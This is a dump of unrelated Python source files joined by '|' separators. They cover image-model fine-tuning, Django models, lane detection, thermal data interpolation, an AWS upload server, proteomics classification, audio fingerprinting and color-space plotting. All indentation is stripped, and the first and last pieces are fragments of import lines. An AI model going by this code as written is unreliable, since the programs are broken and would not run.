from sklearn.model_selection import train_test_split
from math import *
import sys
import sklearn.neighbors._base
sys.modules['sklearn.neighbors.base'] = sklearn.neighbors._base
from missingpy import MissForest
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve, auc
import matplotlib as mpl
from scipy import interp
import sweetviz as sv
#%matplotlib inline |
# encoding=utf-8
# Date: 2018-10-14
# Author: MJUZY
# Important Referrence:
# https://blog.csdn.net/zpalyq110/article/details/80432827
# https://github.com/Freemanzxp/Image-category-understanding-and-application/blob/master/main/MedicalLargeFine_tuning.py
import os
from keras.preprocessing.image import ImageDataGenerator
from Prepare import base_dir
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
train_datagen = ImageDataGenerator(
rescale=1. / 255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(224, 224),
batch_size=20,
class_mode='categorical')
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(224, 224),
batch_size=20,
class_mode='categorical')
from keras.applications import VGG16
from keras.models import Model
from keras.layers import Dense, Flatten
from keras import optimizers
model = VGG16(weights='vgg16_weights_tf_dim_ordering_tf_kernels.h5',
include_top=True)
# Attention: Pop the layers from the bottom layer to the shallow layer
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.outputs = [model.layers[-1].output]
x = Flatten()(model.layers[-1].output) # Attention: Very important operation------------------------------------------!
x = Dense(256, activation='relu')(x) # Attention: This is a really strange script structure------------------------!
x = Dense(8, activation='softmax')(x)
model = Model(model.input, x)
for layer in model.layers[:9]:
layer.trainable = False
model.compile(optimizer=optimizers.RMSprop(lr=2e-5),
loss='categorical_crossentropy',
metrics=['acc'])
model.summary()
history = model.fit_generator(
train_generator,
steps_per_epoch=100, # Stands for the total times of the training loop
epochs=40,
validation_data=validation_generator,
validation_steps=50)
model.save('VGG16FineTune_8_Clothes_Classes_CutSomelayers.h5')
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and Validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
""" Appendix :
Layer (type) Output Shape Param #
=================================================================
input_1 (InputLayer) (None, 224, 224, 3) 0
_________________________________________________________________
block1_conv1 (Conv2D) (None, 224, 224, 64) 1792
_________________________________________________________________
block1_conv2 (Conv2D) (None, 224, 224, 64) 36928
_________________________________________________________________
block1_pool (MaxPooling2D) (None, 112, 112, 64) 0
_________________________________________________________________
block2_conv1 (Conv2D) (None, 112, 112, 128) 73856
_________________________________________________________________
block2_conv2 (Conv2D) (None, 112, 112, 128) 147584
_________________________________________________________________
block2_pool (MaxPooling2D) (None, 56, 56, 128) 0
_________________________________________________________________
block3_conv1 (Conv2D) (None, 56, 56, 256) 295168
_________________________________________________________________
block3_conv2 (Conv2D) (None, 56, 56, 256) 590080
_________________________________________________________________
block3_conv3 (Conv2D) (None, 56, 56, 256) 590080
_________________________________________________________________
block3_pool (MaxPooling2D) (None, 28, 28, 256) 0
_________________________________________________________________
block4_conv1 (Conv2D) (None, 28, 28, 512) 1180160
_________________________________________________________________
block4_conv2 (Conv2D) (None, 28, 28, 512) 2359808
_________________________________________________________________
block4_conv3 (Conv2D) (None, 28, 28, 512) 2359808
_________________________________________________________________
block4_pool (MaxPooling2D) (None, 14, 14, 512) 0
_________________________________________________________________
flatten_1 (Flatten) (None, 100352) 0
_________________________________________________________________
dense_1 (Dense) (None, 256) 25690368
_________________________________________________________________
dense_2 (Dense) (None, 8) 2056
=================================================================
Total params: 33,327,688
Trainable params: 32,182,280
Non-trainable params: 1,145,408
_________________________________________________________________
Epoch 1/40
""" |
from django.db import models
from django.utils import timezone
# Create your models here.
class City(models.Model):
name = models.CharField(max_length=25)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'cities'
class Data(models.Model):
name = f'{str(timezone.now()).replace(" ", "_")}_export.json'
export_name = models.CharField(max_length=int(len(name) + 5), default=name)
span_int = models.IntegerField(name="span_int", default=7)
wind_direction = models.BooleanField(name='wind_direction', default=False)
avg_wind_speed = models.BooleanField(name="avg_wind_speed", default=False)
wind_gust = models.BooleanField(name="wind_gust", default=False)
rainfall = models.BooleanField(name="rainfall", default=False)
humidity = models.BooleanField(name="humidity", default=False)
ambient_temp = models.BooleanField(name="ambient_temp", default=False)
ground_temp = models.BooleanField(name="ground_temp", default=False)
pressure = models.BooleanField(name="pressure", default=False)
timestamps = models.BooleanField(name="timestamps", default=False)
def export(self):
pass
def __str__(self):
return self.export_name, self.span_int, self.wind_direction, self.avg_wind_speed, self.wind_gust, self.rainfall, \
self.humidity, self.ambient_temp, self.ground_temp, self.pressure, self.timestamps
class Config(models.Model):
def __str__(self):
pass
|
import numpy as np
import cv2
#creating a function to convert the RGB image to Grayscale
def RGBtoGray(image):
return cv2.cvtColor(image,cv2.COLOR_RGB2GRAY)
#creating a function for Smoothing the Grayscale image
def smoothing(image,kernel_size):
return cv2.GaussianBlur(image,(kernel_size,kernel_size),0)
#this creates a canny edge detector image
def detected_edges(image,low_threshold,high_threshold):
return cv2.Canny(image,low_threshold,high_threshold)
#creating a mask to just run the Canny Edge detector in the region of the image where we have the lanes
def mask_image(image,vertices,cvtToColor):
a = np.zeros_like(image)*0
b = cv2.fillPoly(a,vertices,cvtToColor)
return cv2.bitwise_and(image,b)
cap = cv2.VideoCapture('test_videos/solidYellowLeft.mp4')
fourcc = cv2.VideoWriter_fourcc(*'DIVX')
out = cv2.VideoWriter('test_videos_output/solidYellowLeft.mp4', fourcc, 25, (960, 540))
while(cap.isOpened()):
ret, frame = cap.read()
if not ret:
break
##Main Code
image1_gray = RGBtoGray(frame)
image1_gray_smoothed = smoothing(image1_gray,7)
edges_image1 = detected_edges(image1_gray_smoothed,20,75)
##finds lines on the right side of the image
vertices = np.array([[[(480,539),(900,539),(480,285),(490,285)]],[[(500,539),(80,539),(490,285),(500,285)]]])
edges_r = mask_image(edges_image1,(vertices[0]),255)
edges_l = mask_image(edges_image1,(vertices[1]),255)
d=1
theta = np.pi/180
max_length = 50
min_gap = 10
pixel_no = 10 #no of pixels that will be used to plot the lines
alpha = 1.5
beta = 0.8
gamma = 0
HL_r = cv2.HoughLinesP(edges_r,d,theta,max_length,min_gap) #right lane
HL_l = cv2.HoughLinesP(edges_l,d,theta,max_length,min_gap) #left lane
s_r = HL_r.shape[0]
s_l = HL_l.shape[0]
b = np.zeros_like(frame)*0
##to detect the right-lanes
x1 = np.ones((s_r),dtype='int32')
x2 = np.ones((s_r),dtype='int32')
y1 = np.ones((s_r),dtype='int32')
y2 = np.ones((s_r),dtype='int32')
for i in range(s_r):
j=0
x1[i] = (HL_r[i][0][j])
x2[i]= (HL_r[i][0][j+2])
y1[i] = (HL_r[i][0][j+1])
y2[i] = (HL_r[i][0][j+3])
X1 = np.hstack((x1,x2))
Y1 = np.hstack((y1,y2))
lane_right = np.polyfit(X1,Y1,1)
x1_new = np.linspace(500,900,500)
y1_new = np.polyval(lane_right,x1_new)
y1_min = int(np.min(y1_new))
y1_max = int(np.max(y1_new))
point1_1 = (500,y1_min)
point2_1 = (900,y1_max)
lines_right = cv2.line(b,point1_1,point2_1,(0,0,255),pixel_no)
final_right = cv2.addWeighted(lines_right,alpha,frame,beta,gamma)
##to detect the left-lanes
x3 = np.ones((s_l),dtype='int32')
x4 = np.ones((s_l),dtype='int32')
y3 = np.ones((s_l),dtype='int32')
y4 = np.ones((s_l),dtype='int32')
for i in range(s_l):
j=0
x3[i] = (HL_l[i][0][j])
x4[i]= (HL_l[i][0][j+2])
y3[i] = (HL_l[i][0][j+1])
y4[i] = (HL_l[i][0][j+3])
X2 = np.hstack((x3,x4))
Y2 = np.hstack((y3,y4))
lane_left = np.polyfit(X2,Y2,1)
x2_new = np.linspace(80,450,500)
y2_new = np.polyval(lane_left,x2_new)
y2_min = int(np.min(y2_new))
y2_max = int(np.max(y2_new))
point1_2 = (80,y2_max)
point2_2 = (450,y2_min)
lines_left = cv2.line(b,point1_2,point2_2,(0,0,255),pixel_no)
frame = cv2.addWeighted(lines_left,alpha,frame,beta,gamma)
out.write(frame)
cv2.imshow('frame',frame)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cap.release()
out.release()
cv2.destroyAllWindows()
|
import numpy as np
from scipy import interpolate
import pandas as pd
import os
import time
import multiprocessing
import matplotlib.pyplot as plt
import sys
lower_T=1500
lower_T*=1000
paths = [r"a05",r"a10",r"a20",r"a40"]
file_end = '.txt'
def tt(files):
dir_path = os.path.join(path, files[1])
print(dir_path, files[0],time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
test = pd.read_csv(dir_path,header=None,skiprows=[0,1],sep='\s+',)
xy = pd.read_csv('xy.dat',header=None,skiprows=[0,1],sep='\s+')
nn = pd.concat([xy[0]*100000,xy[1]*100000,test[1]*1000],axis=1)
nn.columns = ['x', 'y', 'T']
nn=nn.sort_values(by=['y','x'],ascending=True)
nn.reset_index(drop=True, inplace=True)
nn= pd.DataFrame(data=nn,dtype=np.int)
tmp=nn[(nn['T']>=lower_T)].groupby('y')['x'].idxmin()
tt = []
for i in tmp:
if nn.loc[i, :]['y'] == nn.loc[i - 1, :]['y']:
b = nn.loc[i, :]
s = nn.loc[i - 1, :]
xd = (lower_T - s['T']) / (b['T'] - s['T']) * (b['x'] - s['x']) + s['x']
tt.append([xd,b['y']])
tt = pd.DataFrame(tt,columns=['x','y'])
x = tt['y']
y = tt['x']
spl = interpolate.splrep(x, y)
x2 = np.arange(x.min(),x.max(),0.1)
y2 = interpolate.splev(x2, spl)
xnew = y[:y.idxmin()] # x
ynew = x[:y.idxmin()] # y
ttt = [[y2.min(),x2[y2.argmin()],np.degrees(np.arctan((xnew.max()-xnew.min())/(ynew.max()-ynew.min())))]]
tttdir = os.path.join(tmppath,files[1])
np.savetxt(tttdir,ttt)
def getmin(path):
filelist = os.listdir(path)
pool = multiprocessing.Pool()
for files in enumerate(filelist):
pool.apply_async(tt,(files,))
pool.close()
pool.join()
def merge(path):
tmp = pd.DataFrame()
for i in os.listdir(tmppath):
dir_path = os.path.join(tmppath,i)
tmp = tmp.append(pd.read_csv(dir_path,header=None,sep='\s+',))
np.savetxt(path+file_end,tmp)
def draw(path,lim):
nn = pd.read_csv(path + file_end, header=None, skiprows=[0, 1, 2], sep="\s+", )
lim[0] = max(lim[0],nn[0].max())
lim[1] = min(lim[1],nn[0].min())
lim[2] = max(lim[2],nn[1].max())
lim[3] = min(lim[3],nn[1].min())
plt.scatter(nn[0] / 100000, nn[1] / 100000, c=nn[2],cmap = 'coolwarm_r')
plt.text(x=nn[0].min()/100000, y=nn[1].min()/100000, s=path, fontsize=15)
if __name__=='__main__':
tmppath = r'a20tmp'
if not os.path.exists(tmppath):
os.makedirs(tmppath)
for i in os.listdir(tmppath):
dir_path = os.path.join(tmppath,i)
os.remove(dir_path)
for path in paths:
getmin(path)
merge(path)
for i in os.listdir(tmppath):
dir_path = os.path.join(tmppath,i)
os.remove(dir_path)
os.removedirs('a20tmp')
lim = [-sys.maxsize, sys.maxsize, -sys.maxsize, sys.maxsize]
for path in paths:
draw(path, lim)
cb = plt.colorbar()
cb.set_label('Angle/degree at Temperatur' + str(lower_T / 1000) + 'K')
plt.xlim(1.7e-4, 3e-4)
plt.ylim(0.006, 0.013)
# plt.xlim((lim[1] - 1) / 100000, (lim[0] + 1) / 100000)
# plt.ylim((lim[3] - 10) / 100000, (lim[2] + 10) / 100000)
plt.grid(linestyle='-', color='0.5', linewidth=2)
plt.xlabel('x/m')
plt.ylabel('y/m')
plt.savefig('final')
plt.show()
|
from bottle import route, run, static_file, response, template
import bottle
import boto
import json
import boto.sqs
import string
import uuid, time
import boto.dynamodb2 as ddb
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table
import base64, hmac, hashlib
import urllib2
from boto.sqs.message import RawMessage
conn = boto.connect_s3()
sns = boto.connect_sns()
sqs = boto.connect_sqs()
# this must be changed
# redirect_url = 'http://ec2-52-2-66-81.compute-1.amazonaws.com:8888/annotator/run'
redirect_url = 'http://lyc.ucmpcs.org:8888/redirect'
# for debugging
@route('/')
def index():
return "Welcome to Web Server!"
# upload file using form
@route('/upload', method='GET')
def upload_file_to_s3():
# define S3 policy document
policy = """{"expiration":"2016-07-17T12:00:00.000Z",
"conditions":
[{"bucket":"gas-inputs"},
["starts-with", "$key", "lyc/"],
{"acl": "private"},
["starts-with", "$success_action_redirect","http://lyc.ucmpcs.org:8888/redirect"],
{"x-amz-algorithm": "AWS2-HMAC-SHA1"}
]
}"""
# encode and sign policy document
encoded_policy = base64.b64encode(policy)
signature = base64.b64encode(hmac.new(conn.aws_secret_access_key, encoded_policy, hashlib.sha1).digest())
# Generate a unique job ID
jobID = str(uuid.uuid4())
# render 'upload.tpl' template and pass in variables
return template('upload.tpl',bucket_name='gas-inputs', acl='private', algorithm='AWS2-HMAC-SHA1', aws_key=conn.aws_access_key_id, encoded_policy=encoded_policy, signature=signature, job_id = jobID, redirect_url=redirect_url)
@route("/redirect", method="GET")
def send_annotation_request():
# Get bucket name and key from the S3 redirect URL
bucket_name = bottle.request.query.bucket
key = bottle.request.query.key.split('/')[1] # jobID~test.txt
jobID = key.split('~')[0]
file_name = key.split('~')[1]
# Create a job item and persist it to the annotations database
ann_table = Table('lyc-annotations', schema=[HashKey('job_id')], connection = ddb.connect_to_region('us-east-1'))
data = {'job_id': jobID, 'username': 'lyc', 's3_inputs_bucket': bucket_name, 's3_key_input_file': 'lyc/'+key, 'input_file_name': file_name, 'submit_time': int(time.time()), 'status':'pending'}
ann_table.put_item(data=data)
###------------------------------------------------------------------###
## Create new request that includes the same data in the body
# url ="http://ec2-52-2-66-81.compute-1.amazonaws.com:8888/annotator/analysis"
# headers = {'Content-Type': 'application/json'}
# ann_request = urllib2.Request(url, json.dumps(data), headers)
## Send request (as an HTTP POST) to the annotator API
# annotator_response = urllib2.urlopen(ann_request)
## returns a response to the user containing the job ID and the filename
# return annotator_response
###------------------------------------------------------------------###
# publish a notification to the SNS topic
# http://ridingpython.blogspot.com/2011/11/aws-sns-how-to-send-out-messages-to-e.html
queue = sqs.get_queue('lyc-job-requests')
# publishes a notification to the SNS topic
m = RawMessage()
m.set_body(json.dumps(data))
queue.write(m)
# returns a response to the user containing the job ID and the filename
response = '{"code": "200 OK", "data": {"id": "%s", "input_file": "%s"}}' % (jobID, key)
return response
# gets a list of objects from your S3 input bucket
@route('/list_jobs', method='GET')
def display_files_in_s3():
# use boto to establish connection and get 'gas-inputs' bucket
bucket = conn.get_bucket('gas-inputs', validate=False)
# get 'lyc' directory within the bucket, append file names in the list to response message
response = '{"files": '
for key in bucket.list('lyc'):
response += key.name + ' '
response += '}'
return json.dumps(response)
bottle.run(host='0.0.0.0',port=8888,debug=True) |
__author__ = "Navratan Bagwan"
import all_stats
import pdb
import numpy
import os
import glob
def ptmClassifier(listofpaths, sigmafIle, Outfilename):
print (sigmafIle)
#sigmaValue = float(all_stats.sigmaFinder(sigmafIle))
outpath = os.path.dirname(listofpaths)
assignationFile = glob.glob(os.path.join(outpath, "AllWithSequence-massTag.txt"))
sigmafilePath = glob.glob(os.path.join(outpath, str(sigmafIle)))
print (sigmafilePath)
sigmaValue = float(all_stats.sigmaFinder(sigmafilePath[0]))
tag = outpath + "/" + Outfilename
tagFile = open(tag, "a")
header = ["Scan", "\t", "SearchEngineRank", "\t", "Charge", "\t", "Exp Mh", "\t", "Theo mh+", "\t", "Exp MZ", "\t", "Xcor", "\t",
"Seq", "\t", "RetentionTIme", "\t", "Protein", "\t", "Delta_MOD" ,"\t", "B_series","\t", "Y_series", "\t", "Jumps", "\t",
"DeltaPeptide", "\t", "FileName", "\t", "CorXcor" "\t", "New_expMH", "\t", "label", "\t",
"median", "\t", "Calibrated Delta MH", "\t", "Calibrated Delta MZ","\t", "Calibrated EXP MZ","\t", "Tags", "\t",
"fastaDescription", "\t", "seq_mass", "\t", "PeakApex/Dmass", "\t", "DeltaPeptide", "\t", "PPMerror Orphancalss",
"\t", "ClassNumber", "\t", "Apex/OrphanClassMass", "\t", "FinalSeq", "\n"]
tagFile.writelines("".join(header))
mainList = []
finalList = []
nonOrphanList = []
# for everypath in listofpaths:
# filename = everypath + "/" + "NotassignedSequences.txt"
with open(assignationFile[0]) as unassignedFile:
next(unassignedFile)
for line in unassignedFile:
if line != "\n":
splits = line.split("\t")
calibratedDelta_MH = splits[20].strip()
if splits[23].strip() == "Orphan":
mainList.append([outpath + "\t" + line.strip() + "\t", float(calibratedDelta_MH.strip())])
else:
nonOrphanList.append([outpath + "\t" + line.strip()])
# print len(mainList)
# print len(nonOrphanList)
for notOrphan in nonOrphanList:
lineToadd = "\t".join(notOrphan[0].split("\t")[1:]) + "\t" + "NA" + "\t" + "NA" + "\t" + str(notOrphan[0].split("\t")[27]) + "\t" + str(notOrphan[0].split("\t")[28]) + "\n"
tagFile.writelines(lineToadd)
mainList.sort(key=lambda x: x[1])
for index in range(len(mainList)):
m1 = mainList[index][1]
if index == 0:
m0 = 0
else:
m0 = mainList[index - 1][1]
try:
ppmError = abs((m0 - m1) / m0) * 1000000
except ZeroDivisionError:
ppmError = 0.0
finalList.append([mainList[index][0], str(ppmError)])
classList = []
for index1 in range(len(finalList)):
if index1 == 0:
classificationTerm = 1
classList.append([finalList[index1][0] + finalList[index1][1], str(classificationTerm)])
else:
if float(finalList[index1][1]) <= sigmaValue:
classificationTerm = classificationTerm
classList.append([finalList[index1][0] + finalList[index1][1], str(classificationTerm)])
else:
classificationTerm = classificationTerm + 1
classList.append([finalList[index1][0] + finalList[index1][1], str(classificationTerm)])
classDic = {}
for classes in classList:
if classes[1].strip() not in classDic:
classDic[classes[1].strip()] = [float(classes[0].split("\t")[21])]
else:
classDic[classes[1].strip()].append(float(classes[0].split("\t")[21]))
for dikey in classDic:
medianValuelist = classDic[dikey]
if len(medianValuelist) < 2:
massOfOrphan = medianValuelist[0]
# intformula = int(massOfOrphan / float(binvalue)) * float(binvalue) + float(binvalue) / 2
orphanPTM = all_stats.check(massOfOrphan, 6)
classDic[dikey].append(orphanPTM)
else:
massOfOrphan = numpy.median(medianValuelist)
# intformula = int(massOfOrphan / float(binvalue)) * float(binvalue) + float(binvalue) / 2
orphanPTM = all_stats.check(massOfOrphan, 6)
classDic[dikey].append(orphanPTM)
for appendingPTMinList in classList:
if appendingPTMinList[1] in classDic:
ptmINT = classDic[appendingPTMinList[1]][1:][0]
appendingPTMinList.append(all_stats.check(float(ptmINT),6))
appendingPTMinList.append("Orphan")
DicTomergeFiles = {}
for ii in classList:
PathTO_ptmFile = ii[0].split("\t")[0]
if PathTO_ptmFile not in DicTomergeFiles:
DicTomergeFiles[PathTO_ptmFile] = [ii]
else:
DicTomergeFiles[PathTO_ptmFile].append(ii)
for pathInDic in DicTomergeFiles:
if pathInDic in outpath:
# tag = pathInDic + "/" + "ClassTest_AllWithSequence-massTag.txt"
# tagFile = open(tag, "a")
for linestring in DicTomergeFiles[pathInDic]:
deltaPeptide = linestring[0].split("\t")[15]
if deltaPeptide.isalpha():
finalSeqMassTag = deltaPeptide
else:
for index in range(0, len(deltaPeptide)):
if deltaPeptide[index] == "[":
startofMOD = index
if deltaPeptide[index] == "]":
endofMOD = index
tempPepe = deltaPeptide[startofMOD + 1:endofMOD]
newclose = all_stats.check(float(linestring[2]), 6)
finalSeqMassTag = deltaPeptide.replace(tempPepe, str("{:.6f}".format(float(newclose))))
lineToadd = "\t".join(linestring[0].split("\t")[1:]) + "\t" + str(linestring[1]) + "\t" + str(linestring[2]) + "\t" + finalSeqMassTag + "\n"
tagFile.writelines(lineToadd)
tagFile.close()
# def callCallisifer(listoffiles, sigmafiles):
# pdb.set_trace()
# calssifierFucntion = partial(ptmClassifier, sigmafile=sigmafiles)
# with concurrent.futures.ProcessPoolExecutor() as executor:
# executor.map(calssifierFucntion, listoffiles)
|
__author__ = 'ardila'
import numpy as np
def feature_split_large(n_features, n_samples, n_bootstrap):
"""
Generate a set of indexes which subsample features of sizen_features
start at n_features/2
get a linear space of n_samples up to n_features.
resample each one n_bootstrap times
"""
assert n_samples <= n_features/2
sizes = np.linspace(np.ceil(n_features/2.), n_features, n_samples)
all_inds =np.arange(n_features)
rng = np.random.RandomState(0)
inds = []
print sizes
for _ in range(n_bootstrap):
for size in sizes:
rng.shuffle(all_inds)
inds.append(list(all_inds[:size]))
return inds
def feature_split(n_features, n_samples, n_bootstrap, max_samples_per_size):
"""
Select indexes up to n_features without replacement or overlap
:param n_features: number of features to select from
:param n_samples: number of distinctly sized sample selections (2 at a time, 3 at a time... etc)
:param n_bootstrap: number of times to shuffle and reselect per size
:param max_samples_per_size: maximum number of chunks to take per distinct size
"""
feature_splits = []
# The least you can take is 2
min_features = 2
# The most you can take without replacement or overlap is n_features/2
max_features = n_features/2
# Therefore this is the max amount of distinct sizes of samples to take
max_n_samples = max_features-min_features+1
n_samples = min([max_n_samples, n_samples])
chunk_sizes = [int(size) for size in np.round(np.linspace(min_features, max_features, n_samples))]
all_inds = range(n_features)
rng = np.random.RandomState(0)
for chunk_size in chunk_sizes:
n_chunks = int(n_features)/int(chunk_size)
n_chunks = min(max_samples_per_size, n_chunks)
for _ in range(n_bootstrap):
rng.shuffle(all_inds)
for chunk_ind in range(0, n_chunks):
feature_splits.append(all_inds[chunk_ind*chunk_size:(chunk_ind+1)*chunk_size])
return feature_splits
|
#!/usr/bin/env python
import math
import random
import shutil
import subprocess
import tempfile
import time
from os import getcwd
from pathlib import Path
from sys import exit
from pydub import AudioSegment
MUSIC_DIR = Path("/home/kajm/media/music") # change to directory with mp3 files
MP3_FILES = list(MUSIC_DIR.glob("**/*.mp3")) # glob for finding mp3files
TEST_DATA = random.sample(MP3_FILES, 10) # 10 is the number of songs to test out
def calculate_fingerprint(path):
try:
prog = ["fpcalc", "-raw", "-plain", path]
fp = None
with subprocess.Popen(prog, stdout=subprocess.PIPE, text=True) as proc:
fp_raw = proc.stdout.read()
fp = list(map(int, fp_raw.split(",")))
return fp
except ValueError:
shutil.copy(path, getcwd())
return None
def create_duration_samples(path, dest_dir):
"""
Create 5 random samples from a given song. Both the
position they starts in the song and how long the
samples are is randomized. Occasionally creates.
"""
song = AudioSegment.from_mp3(path)
samples = [random.randint(5, 20) for _ in range(5)]
song_name = path.stem
snippets = []
for i in samples:
start = random.randint(0, 60)
snippet = song[start * 1000: (i + start) * 1000]
snippet_path = dest_dir / (song_name + f"_{i}_{start}s" + path.suffix)
snippet.export(snippet_path)
snippets.append(((i, start), snippet_path))
return snippets
def make_slices(same_positions, limit):
"""
Create collection of slices by merging consecutive
positions and beginning/ending slices at the transitions
between positions e.e [1, 2, 3, 5, 6, 8] becomes
[(1, 3), (5, 6), (8, 8)]. Slices are inclusive of
the end
"""
sp = same_positions[:]
slices = []
while len(sp) > 1:
try:
start = sp[0]
while sp[0] + 1 == sp[1]:
sp.pop(0)
slices.append((start, sp[0]))
sp.pop(0)
except IndexError:
continue
for s in sp:
slices.append((s, s))
return slices
def find_matching_positions(l1, l2):
"""
l2 assumed to be longer than l1. Always use
the index of first value in l1 present in l2
"""
r1 = []
r2 = []
for (j, v) in enumerate(l2):
try:
i = l1.index(v)
r1.append(i)
r2.append(j)
except ValueError:
continue
return (r1, r2)
def avg_distance(sample, candidate):
"""
A value of 0 is ideal and means that the sample fingerprint
is a proper subset of candidate fingerprint. math.inf in our
case means that there's no way the fingerprints come from the
same song
"""
# find positions where the two fingerprints are equal
sample_positions, candidate_positions = find_matching_positions(
sample, candidate
)
if len(sample_positions) == 0: # return early since no similar positions
return math.inf
all_diffs = []
sample_slices = make_slices(sample_positions, len(sample_positions))
candidate_slices = make_slices(
candidate_positions, len(candidate_positions)
)
# find slices and compute their differences
for ((ss, se), (cs, ce)) in zip(sample_slices, candidate_slices):
if ss == se and cs == ce:
all_diffs.append(abs(sample[ss] - candidate[cs]))
else:
sample_slice = sample[ss : se + 1]
candidate_slice = candidate[cs : ce + 1]
diffs = [
abs(x - y) for (x, y) in zip(sample_slice, candidate_slice)
]
all_diffs.append(
sum(diffs) / len(diffs)
) # average distance between fingerprints in slices
return sum(all_diffs) / len(all_diffs) # average of all differences
def compare_single_track(song, tdir, reference, reffp):
title = song.stem
print("-" * 70)
print(f"Current: {title:<50s}")
print("*" * 70)
print(f"Random Reference: {reference.stem:<50}")
print("-" * 70)
orig_fingerprint = calculate_fingerprint(song)
samples = create_duration_samples(song, Path(tdir))
if orig_fingerprint is None:
print(f"Could not calculate fingerprint for track")
return
for ((duration, start), sample) in samples:
s = calculate_fingerprint(sample)
if s is None:
print(f"Could not calculate fingerprint for {samples[0][1]}")
continue
start_time = time.process_time()
dist = avg_distance(s, orig_fingerprint)
dur = time.process_time() - start_time
print(f"Fingerprint comparison completed in {dur:.8f}s")
ref_dist = avg_distance(s, reffp)
print(
f"Sample starting {start}s to {start + duration}s\n"
f"Distance to candidate {dist:.2f}\n"
f"Distance to reference {ref_dist:.2f}\n"
)
def main():
track = random.choice(TEST_DATA)
random_reference = random.choice(TEST_DATA)
ref = calculate_fingerprint(random_reference)
if not ref:
print(f"Could not calculate fingerprint for reference")
exit(1)
with tempfile.TemporaryDirectory() as tdir:
for track in TEST_DATA:
compare_single_track(track, tdir, random_reference, ref)
if __name__ == "__main__":
main()
|
from energydiagram import ED
from matplotlib.backends.backend_pdf import PdfPages
diagram = ED()
diagram.add_level(-646.499346248,'Closed Shell Molecule')
diagram.add_level(-645.842343146,'C3 unrelaxed')
diagram.add_level(-645.852575856,'C4 unrelaxed','last')
diagram.add_level(-645.852440887,'C5 unrelaxed','last')
diagram.add_level(-645.866923481,'C3 relaxed',)
diagram.add_level(-645.868512298,'C4 relaxed','last')
diagram.add_level(-645.866256558,'C5 relaxed','last')
diagram.add_link(0,1)
diagram.add_link(0,2)
diagram.add_link(0,3)
diagram.add_link(1,4)
diagram.add_link(2,5)
diagram.add_link(3,6)
diagram.plot(show_IDs=True)
my_fig = diagram.fig
|
import plotly
import plotly.graph_objs as go
import numpy as np
import colour
d65 = colour.ILLUMINANTS['CIE 1931 2 Degree Standard Observer']['D65']
def sRGB2Lab(rgb):
return colour.XYZ_to_Lab(colour.sRGB_to_XYZ(rgb / 255, illuminant=d65), illuminant=d65)
gridN = 9
grid = np.linspace(0,256,gridN,True) - 1
grid[0] = 0
rr, gg, bb = np.meshgrid(grid,grid,grid,indexing="ij")
rgb = np.stack((rr,gg,bb), axis=3)
ind_Xp = rgb[:,:,:,0]==255
ind_Xm = rgb[:,:,:,0]==0
ind_Yp = rgb[:,:,:,1]==255
ind_Ym = rgb[:,:,:,1]==0
ind_Zp = rgb[:,:,:,2]==255
ind_Zm = rgb[:,:,:,2]==0
print("convert sRGB to Lab")
lab = np.apply_along_axis(sRGB2Lab, 3, rgb)
print("extract faces")
vXp = lab[ind_Xp].reshape((-1,3))
vXm = lab[ind_Xm].reshape((-1,3))
vYp = lab[ind_Yp].reshape((-1,3))
vYm = lab[ind_Ym].reshape((-1,3))
vZp = lab[ind_Zm].reshape((-1,3))
vZm = lab[ind_Zp].reshape((-1,3))
cXp = rgb[ind_Xp].reshape((-1,3))
cXm = rgb[ind_Xm].reshape((-1,3))
cYp = rgb[ind_Yp].reshape((-1,3))
cYm = rgb[ind_Ym].reshape((-1,3))
cZp = rgb[ind_Zm].reshape((-1,3))
cZm = rgb[ind_Zp].reshape((-1,3))
faces = []
for i in range(gridN-1):
for j in range(gridN-1):
faces.append([i*gridN + j, (i+1)*gridN + j, i*gridN + (j+1)])
faces.append([(i+1)*gridN + j, (i+1)*gridN + (j+1), i*gridN + (j+1)])
faces = np.array(faces, dtype=int)
v_planes = [vXp, vXm, vYp, vYm, vZp, vZm]
c_planes = [cXp, cXm, cYp, cYm, cZp, cZm]
data = []
for v,c in zip(v_planes,c_planes):
edge = []
for i in range(gridN):
for j in range(gridN):
if i < gridN-1:
edge += [v[i*gridN+j], v[(i+1)*gridN + j], [None]*3]
if j < gridN-1:
edge += [v[i*gridN+j], v[i*gridN + (j+1)], [None]*3]
edge = np.array(edge)
go_edge = go.Scatter3d(
x = edge[:,1],
y = edge[:,2],
z = edge[:,0],
mode="lines",
line=go.scatter3d.Line(color=('rgb(100,100,100)'))
)
go_mesh = go.Mesh3d(
x = v[:,1],
y = v[:,2],
z = v[:,0],
i = faces[:,0],
j = faces[:,1],
k = faces[:,2],
vertexcolor=c,
lighting = dict(
ambient=1,
diffuse=0,
specular=0,
roughness=0,
fresnel=0
)
)
data.append(go_mesh)
data.append(go_edge)
layout = go.Layout(
scene = dict (
xaxis = dict (
range = [-127,127]
),
yaxis = dict(
range = [-127,127]
),
zaxis = dict(
range = [0,100]
)
)
)
fig = go.Figure(data=data, layout=layout)
print("plot")
plotly.offline.plot(fig) |
#! /usr/bin/env python
if __name__ == '__main__':
import sys
sys.path.insert(0, '/home/mininet/pox')
import pox.boot
pox.boot.boot()
|
import logging
import random
import time
from selenium import common
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
